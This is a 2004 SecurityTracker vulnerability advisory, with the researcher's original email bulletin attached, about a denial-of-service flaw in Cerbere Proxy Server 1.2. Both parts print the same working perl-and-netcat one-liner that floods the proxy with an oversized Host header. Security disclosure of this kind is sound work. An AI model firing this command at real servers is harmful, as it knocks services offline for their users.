Cerbere Proxy Server Lets Remote Users Consume Excessive CPU Resources
|
|
SecurityTracker Alert ID: 1011133 |
|
SecurityTracker URL: http://securitytracker.com/id/1011133
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 1 2004
|
Impact:
Denial of service via network
|
Exploit Included: Yes
|
Version(s): 1.2
|
Description:
Ziv Kamir from Global Security Solution IT reported a vulnerability in Cerbere Proxy Server. A remote user can cause denial of service conditions.
It is reported that a remote user can supply an HTTP GET request with a long 'Host:' header field to to cause the target web service to consume all available CPU resources.
A demonstration exploit command is provided:
perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP"
The vendor was notified on August 19, 2004.
|
Impact:
A remote user can cause the target service to consume all available CPU resources.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: cerbere.szym.org/ (Links to External Site)
|
Cause:
Exception handling error
|
Underlying OS:
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 1 Sep 2004 01:11:16 -0700 (PDT)
Subject: Cerbere Proxy Server ver 1.2
|
--0-754376270-1094026276=:5041
Content-Type: multipart/alternative; boundary="0-1344189465-1094026276=:5041"
--0-1344189465-1094026276=:5041
Content-Type: text/plain; charset=us-ascii
---------------------------------
Do you Yahoo!?
Take Yahoo! Mail with you! Get it on your mobile phone.
--0-1344189465-1094026276=:5041
Content-Type: text/html; charset=us-ascii
<p>
<hr size=1>Do you Yahoo!?<br>
<a href="http://us.rd.yahoo.com/mail_us/taglines/mobile/*http://mobile.yahoo.com/maildemo">Take Yahoo! Mail with you!</a> Get it on your mobile phone.
--0-1344189465-1094026276=:5041--
--0-754376270-1094026276=:5041
Content-Type: text/plain; name="cerbere.txt"
Content-Description: cerbere.txt
Content-Disposition: inline; filename="cerbere.txt"
01/09/04
====================================
GSSIT - Global Security Solution IT
====================================
-------------------------------------------------------
Application: Cerbere Proxy Server
Web Site: cerbere.szym.org
Versions: 1.2
Platform: Windows
Bug: D.O.S
Credits:
########
#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# Email : gss_it@yahoo.com #
# #
# #
#########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
================
1) Introduction
================
Cerbere Proxy Server is a proxy server that supports
HTTP, FTP, SSL, DNS, SOCKS 4 and SOCKS 5 protocols.
=======
2) Bug
=======
A remote user can supply a long 'Host:' header field to consume 99% of the CPU.
===========
3) The Code
===========
perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP" 3128
======
4) Fix
======
Date of Vendor Notification:
----------------------------
19/08/04
No Response.
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without
warranty of any kind. In no event shall we be liable for any
damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.
==============================================================================================
--0-754376270-1094026276=:5041--
|
|
